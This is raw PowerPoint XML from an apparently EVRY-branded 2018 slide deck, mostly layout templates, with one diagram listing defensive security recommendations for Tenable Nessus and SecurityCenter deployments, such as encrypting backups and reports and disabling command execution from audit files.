            <a:t>Tenable should take more actions to protect customers’ data.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Implement more efficient protection of databases and files uploaded by users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Disable run any command from audit files (can be enabled only from console) by default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Secure all backend scripts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Delete the option of disabling signature checks in the Nessus web interface</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2889" y="522068"/>
        <a:ext cx="3619291" cy="3285305"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{EE6152DE-204E-40E7-8D57-829CA3965BB6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4128882" y="90068"/>
          <a:ext cx="3925085" cy="432000"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/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accent4">
              <a:hueOff val="-5412583"/>
              <a:satOff val="35875"/>
              <a:lumOff val="-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Customers</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4128882" y="90068"/>
        <a:ext cx="3925085" cy="432000"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5DEF33AB-78B6-4952-8D75-95D15C573133}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4128882" y="522068"/>
          <a:ext cx="3925085" cy="3285305"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent4">
            <a:tint val="40000"/>
            <a:alpha val="90000"/>
            <a:hueOff val="-4780686"/>
            <a:satOff val="11011"/>
            <a:lumOff val="78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780686"/>
              <a:satOff val="11011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Encrypt all backup files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Restrict access to SecurityCenter on OS level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Encrypt all reports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Use password protected private keys where possible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Always sign a non-disclosure agreement with all companies providing security software/services.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Do not create an SSH user for credentialed checks on the server running Nessus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Establish a red team for penetration testing 24/7</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4128882" y="522068"/>
        <a:ext cx="3925085" cy="3285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7624C-10CE-4351-A288-842DAE6E75CE}" type="datetimeFigureOut">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>02.07.2018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65D8B-0CD5-4851-B687-8613192CE88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6673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2DCC-FD35-4DCA-A04E-5F05440D3694}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" noProof="0" smtClean="0"/>
              <a:t>02/07/2018</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB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 err="1"/>
              <a:t>Rediger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C384-521A-4E91-ADF1-9FEFAD9076EE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884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31542"/>
            <a:ext cx="7038000" cy="11695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</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" noProof="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" noProof="0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34417"/>
            <a:ext cx="7038000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540000" y="4572572"/>
            <a:ext cx="7056187" cy="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11" name="Plassholder f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670395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Select classification: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" noProof="0" dirty="0" err="1"/>
              <a:t>evry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" noProof="0" dirty="0"/>
              <a:t> open / protect / restricted / secret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7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="540000" y="378366"/>
            <a:ext cx="3852613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cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{DA5AB0A1-FE8E-4C81-9CA0-C997144D04B3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13" name="Plassholder f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3221826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07630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14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6132318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3544960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6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65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48194"/>
            <a:ext cx="9144000" cy="3595306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19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6250" y="4392000"/>
            <a:ext cx="828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17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3133696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48194"/>
            <a:ext cx="9144000" cy="3595306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19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6250" y="4392000"/>
            <a:ext cx="8280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11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1275023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quote + picture (Northern Light Blue) (blu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548194"/>
            <a:ext cx="3024190" cy="30238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288000" rIns="234000" bIns="360000" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l"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5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6250" y="4392000"/>
            <a:ext cx="828000" cy="432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7893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quote + picture (Northern Light Blue)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548194"/>
            <a:ext cx="3024190" cy="30238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288000" rIns="234000" bIns="360000" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l"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6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7094" y="4392283"/>
            <a:ext cx="827156" cy="432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5629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quote + picture (Arctic Glow Purple) (blu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548194"/>
            <a:ext cx="3024190" cy="30238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288000" rIns="234000" bIns="360000" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l"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5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6250" y="4392000"/>
            <a:ext cx="828000" cy="432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46913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quote + picture (Arctic Glow Purple)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548194"/>
            <a:ext cx="3024190" cy="30238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288000" rIns="234000" bIns="360000" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l"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6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7094" y="4392283"/>
            <a:ext cx="827156" cy="432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43283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quote + picture (Midnight Sun Orange) (blu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548194"/>
            <a:ext cx="3024190" cy="30238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288000" rIns="234000" bIns="360000" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l"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5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6250" y="4392000"/>
            <a:ext cx="828000" cy="432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2186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540000" y="4572572"/>
            <a:ext cx="7056187" cy="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nb-NO"/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12" name="Plassholder f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670395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Select classification: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" noProof="0" dirty="0" err="1"/>
              <a:t>evry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" noProof="0" dirty="0"/>
              <a:t> open / protect / restricted / secret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17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="540000" y="378366"/>
            <a:ext cx="3852613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cap="all" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{03DC223E-6476-4FEA-A9D0-323BC7B7FCBF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31542"/>
            <a:ext cx="7038000" cy="11695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</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" noProof="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" noProof="0" dirty="0"/>
              <a:t>add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34417"/>
            <a:ext cx="7038000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15" name="Plassholder for tekst 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="21" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539750" y="3221826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90318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quote + picture (Midnight Sun Orange)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548194"/>
            <a:ext cx="3024190" cy="30238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288000" rIns="234000" bIns="360000" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l"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6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7094" y="4392283"/>
            <a:ext cx="827156" cy="432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91478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12" name="Tittel 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="540000" y="996176"/>
            <a:ext cx="3852614" cy="1575574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700" b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4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6250" y="4392000"/>
            <a:ext cx="828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292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pictur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6" name="Tittel 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="540000" y="996176"/>
            <a:ext cx="3852614" cy="1575574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4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7094" y="4392283"/>
            <a:ext cx="827156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6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dato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175D-9622-4D84-81EF-2861EFD95B29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46" name="Plassholder for bunntekst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7" name="Plassholder for lysbildenumm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743938" y="378367"/>
            <a:ext cx="4860312" cy="4029508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114105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752000" y="1506584"/>
            <a:ext cx="3852250" cy="29012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9" name="Plassholder for dato 38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DB5738C-C521-4500-800C-2FE7FDACD4EB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40" name="Plassholder for bunntekst 3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1" name="Plassholder for lysbildenummer 4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9" y="1506584"/>
            <a:ext cx="3852251" cy="29012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193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280441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ssholder for dato 38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B8F2D20-5BB9-4D78-B2D1-DE05F3AE5737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40" name="Plassholder for bunntekst 3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1" name="Plassholder for lysbildenummer 4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9" y="1707039"/>
            <a:ext cx="2520315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193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3312255" y="1707039"/>
            <a:ext cx="2520315" cy="270165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>
          <a:xfrm>
            <a:off x="6084762" y="1707039"/>
            <a:ext cx="2520315" cy="2700836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539748" y="1476208"/>
            <a:ext cx="2520315" cy="230832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7" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3312255" y="1476208"/>
            <a:ext cx="2520315" cy="230832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2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6084762" y="1476208"/>
            <a:ext cx="2520315" cy="230832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10401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ssholder for dato 38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4A15781-0B9C-476F-A86A-EAAF33ACF478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40" name="Plassholder for bunntekst 3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1" name="Plassholder for lysbildenummer 4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9" y="1707040"/>
            <a:ext cx="1836230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193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5" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6768835" y="1707040"/>
            <a:ext cx="1836230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692473" y="1707040"/>
            <a:ext cx="1836230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7" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2616111" y="1707040"/>
            <a:ext cx="1836230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2" name="Plassholder for tekst 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="29" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2616110" y="1476208"/>
            <a:ext cx="1836231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3" name="Plassholder for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4692472" y="1476208"/>
            <a:ext cx="1836231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4" name="Plassholder for tekst 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="31" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6768834" y="1476208"/>
            <a:ext cx="1836231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14" name="Plassholder for tekst 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="32" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539748" y="1476208"/>
            <a:ext cx="1836231" cy="230832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545510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ssholder for tekst 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="540000" y="4572572"/>
            <a:ext cx="3848400" cy="3600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="063954"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr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pic>
        <p:nvPicPr>
          <p:cNvPr id="35" name="Bild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E488293-3D83-40C7-AFAD-16320DFD9122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36" name="Plassholder for lysbildenummer 3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7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4752594" y="374650"/>
            <a:ext cx="3852471" cy="4190548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248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8" y="1506584"/>
            <a:ext cx="3852482" cy="29012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1826157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+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ssholder for tekst 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4751998" y="4572572"/>
            <a:ext cx="3852000" cy="3600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="063954"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr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pic>
        <p:nvPicPr>
          <p:cNvPr id="36" name="Bil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8877337-B8FD-4927-AA28-95AF87B05E8C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4751998" y="378366"/>
            <a:ext cx="3852000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10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539999" y="367826"/>
            <a:ext cx="3852482" cy="4190548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51747" y="1506584"/>
            <a:ext cx="3861180" cy="29012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22494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dato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D775-E999-40A9-BF98-F036F56B7695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46" name="Plassholder for bunntekst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7" name="Plassholder for lysbildenumm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Plassholder for bilde 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="23" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539749" y="1548194"/>
            <a:ext cx="4030609" cy="3002254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29" name="Plassholder for bilde 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="24" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4570358" y="1548194"/>
            <a:ext cx="2015873" cy="3002255"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="65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0" name="Plassholder for bilde 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="25" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6588823" y="1548194"/>
            <a:ext cx="2016946" cy="1501388"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="75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1" name="Plassholder for bilde 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="26" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6588000" y="3048801"/>
            <a:ext cx="2016000" cy="1501388"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="85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pic>
        <p:nvPicPr>
          <p:cNvPr id="33" name="Bild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52022" y="381648"/>
            <a:ext cx="3852101" cy="92333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300"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="252000" indent="-126000">
              <a:lnSpc>
                <a:spcPts val="1500"/>
              </a:lnSpc>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:defRPr sz="1100"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="378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3pPr>
            <a:lvl4pPr marL="504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4pPr>
            <a:lvl5pPr marL="630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248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43283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540000" y="4572572"/>
            <a:ext cx="7056187" cy="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nb-NO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14" name="Plassholder f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670395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Select classification: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" noProof="0" dirty="0" err="1"/>
              <a:t>evry</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" noProof="0" dirty="0"/>
              <a:t> open / protect / restricted / secret</a:t>
            </a:r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17"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="540000" y="378366"/>
            <a:ext cx="3852613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C574F24-F357-4E69-A4D6-04B2D00DD534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31542"/>
            <a:ext cx="7038000" cy="11695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</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" noProof="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" noProof="0" dirty="0"/>
              <a:t>add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34417"/>
            <a:ext cx="7038000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3221826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75009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dato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ADA-51E9-4FEC-871C-09866D18CE91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46" name="Plassholder for bunntekst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7" name="Plassholder for lysbildenumm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lassholder for tekst 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="540000" y="1548194"/>
            <a:ext cx="8064250" cy="3600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="063954"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr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52022" y="381648"/>
            <a:ext cx="3852101" cy="92333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300"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="252000" indent="-126000">
              <a:lnSpc>
                <a:spcPts val="1500"/>
              </a:lnSpc>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:defRPr sz="1100"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="378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3pPr>
            <a:lvl4pPr marL="504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4pPr>
            <a:lvl5pPr marL="630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0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2482" cy="100027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3" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="540068" y="1728216"/>
            <a:ext cx="3852482" cy="2696147"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="1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button below to add chart</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Plassholder for diagram 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="chart" sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4752022" y="1728216"/>
            <a:ext cx="3852482" cy="2696147"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="1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button below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26480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two charts/table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ssholder for tekst 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="540000" y="4572572"/>
            <a:ext cx="3848400" cy="3600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="063954"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr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pic>
        <p:nvPicPr>
          <p:cNvPr id="35" name="Bild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DF7431A-C5F4-4647-8872-4B5713A96131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36" name="Plassholder for lysbildenummer 3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248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8" y="1506584"/>
            <a:ext cx="3852482" cy="29012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751388" y="374652"/>
            <a:ext cx="3861539" cy="2037855"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="1"/>
          <a:lstStyle>
            <a:lvl2pPr marL="126000" indent="0">
              <a:buNone/>
              <a:defRPr baseline="0"/>
            </a:lvl2pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" noProof="0" dirty="0"/>
              <a:t>Click buttons below to add chart/table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751388" y="2529125"/>
            <a:ext cx="3861539" cy="2037855"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="1"/>
          <a:lstStyle>
            <a:lvl2pPr marL="126000" indent="0">
              <a:buNone/>
              <a:defRPr baseline="0"/>
            </a:lvl2pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" noProof="0" dirty="0"/>
              <a:t>Click buttons below to add chart/table</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3939122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harts/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48B59D0-260C-4B3A-A82F-F3010B0C0A51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36" name="Plassholder for lysbildenummer 3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540067" y="378366"/>
            <a:ext cx="8072859" cy="338554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 header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8" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="540068" y="906412"/>
            <a:ext cx="3861539" cy="1771422"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="1"/>
          <a:lstStyle>
            <a:lvl2pPr marL="126000" indent="0">
              <a:buNone/>
              <a:defRPr baseline="0"/>
            </a:lvl2pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" noProof="0" dirty="0"/>
              <a:t>Click buttons below to add chart/table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31" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4751388" y="2795558"/>
            <a:ext cx="3861539" cy="1771422"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="1"/>
          <a:lstStyle>
            <a:lvl2pPr marL="126000" indent="0">
              <a:buNone/>
              <a:defRPr baseline="0"/>
            </a:lvl2pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" noProof="0" dirty="0"/>
              <a:t>Click buttons below to add chart/table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751388" y="906412"/>
            <a:ext cx="3861539" cy="1771422"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="1"/>
          <a:lstStyle>
            <a:lvl2pPr marL="126000" indent="0">
              <a:buNone/>
              <a:defRPr baseline="0"/>
            </a:lvl2pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" noProof="0" dirty="0"/>
              <a:t>Click buttons below to add chart/table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30" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="540068" y="2795558"/>
            <a:ext cx="3861539" cy="1771422"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="1"/>
          <a:lstStyle>
            <a:lvl2pPr marL="126000" indent="0">
              <a:buNone/>
              <a:defRPr baseline="0"/>
            </a:lvl2pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" noProof="0" dirty="0"/>
              <a:t>Click buttons below to add chart/table</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4092152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7123" y="2209007"/>
            <a:ext cx="288646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3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7123" y="2209007"/>
            <a:ext cx="288646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5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7123" y="2209007"/>
            <a:ext cx="288646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8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, with contact info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60123" y="2427702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email address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8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260123" y="2658534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mobile number</a:t>
            </a:r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6260123" y="2889366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twitter account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5584825" y="2466670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EMAIL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5584825" y="2703048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MOBILE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5584825" y="2932392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TWITTER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5436" y="2541395"/>
            <a:ext cx="288646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6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, with contact info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5584825" y="2466670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EMAIL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5584825" y="2703048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MOBILE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5584825" y="2932392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TWITTER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60123" y="2427702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email address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8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260123" y="2658534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mobile number</a:t>
            </a:r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6260123" y="2889366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twitter account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5436" y="2541395"/>
            <a:ext cx="288646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52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, with contact info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kstSylinder 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5584825" y="2466670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EMAIL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5584825" y="2703048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MOBILE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8" name="TekstSylinder 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5584825" y="2932392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TWITTER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60123" y="2427702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email address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13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260123" y="2658534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mobile number</a:t>
            </a:r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6260123" y="2889366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twitter account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5436" y="2541395"/>
            <a:ext cx="288646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41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6ADE-8E90-45AB-A554-DB2A65484B81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248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0574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845"/>
            <a:ext cx="9144000" cy="1080655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10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540068" y="1202719"/>
            <a:ext cx="2844354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381648"/>
            <a:ext cx="3852101" cy="3495652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436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09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845"/>
            <a:ext cx="9144000" cy="1080655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8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540068" y="1202719"/>
            <a:ext cx="2844354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381648"/>
            <a:ext cx="3852101" cy="3495652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1112365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845"/>
            <a:ext cx="9144000" cy="1080655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9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540068" y="1202719"/>
            <a:ext cx="2844354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11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381648"/>
            <a:ext cx="3852101" cy="3495652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8609426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alternative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1992739"/>
            <a:ext cx="3852101" cy="257926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5635980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alternative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1992739"/>
            <a:ext cx="3852101" cy="257926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3182084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alternative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1992739"/>
            <a:ext cx="3852101" cy="257926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1683981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ssholder for tekst 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="540000" y="4572572"/>
            <a:ext cx="8064250" cy="3600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="063954"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr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8" y="378366"/>
            <a:ext cx="2844354" cy="100027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468" y="378047"/>
            <a:ext cx="4859782" cy="40289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4862525"/>
            <a:ext cx="367261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">
                <a:solidFill>
                  <a:srgbClr val="698898"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{E99ED1C4-2A63-4D13-B9DF-6724A340AD96}" type="datetime3">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>2 July,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4765665"/>
            <a:ext cx="367261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" cap="all" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="698898"/>
                </a:solidFill>
                <a:latin typeface="+mn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4765664"/>
            <a:ext cx="180000" cy="9233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">
                <a:solidFill>
                  <a:srgbClr val="698898"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle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5" name="Bilde 7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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="MSIPCMContentMarking" descr="{&quot;HashCode&quot;:269484293,&quot;Placement&quot;:&quot;Footer&quot;}">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DADF8903-E42C-4F82-AA46-5CC0EF14E949}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4915336"/>
            <a:ext cx="104546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rmAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr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nb-NO" sz="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Sensitivity: Internal</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="nb-NO" sz="800" b="0" i="0" u="none" strike="noStrike" kern="1200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39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7" r:id="rId3"/>
    <p:sldLayoutId id="2147483721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672" r:id="rId10"/>
    <p:sldLayoutId id="2147483710" r:id="rId11"/>
    <p:sldLayoutId id="2147483709" r:id="rId12"/>
    <p:sldLayoutId id="2147483711" r:id="rId13"/>
    <p:sldLayoutId id="2147483722" r:id="rId14"/>
    <p:sldLayoutId id="2147483674" r:id="rId15"/>
    <p:sldLayoutId id="2147483735" r:id="rId16"/>
    <p:sldLayoutId id="2147483715" r:id="rId17"/>
    <p:sldLayoutId id="2147483734" r:id="rId18"/>
    <p:sldLayoutId id="2147483716" r:id="rId19"/>
    <p:sldLayoutId id="2147483733" r:id="rId20"/>
    <p:sldLayoutId id="2147483680" r:id="rId21"/>
    <p:sldLayoutId id="2147483712" r:id="rId22"/>
    <p:sldLayoutId id="2147483703" r:id="rId23"/>
    <p:sldLayoutId id="2147483702" r:id="rId24"/>
    <p:sldLayoutId id="2147483719" r:id="rId25"/>
    <p:sldLayoutId id="2147483720" r:id="rId26"/>
    <p:sldLayoutId id="2147483705" r:id="rId27"/>
    <p:sldLayoutId id="2147483706" r:id="rId28"/>
    <p:sldLayoutId id="2147483717" r:id="rId29"/>
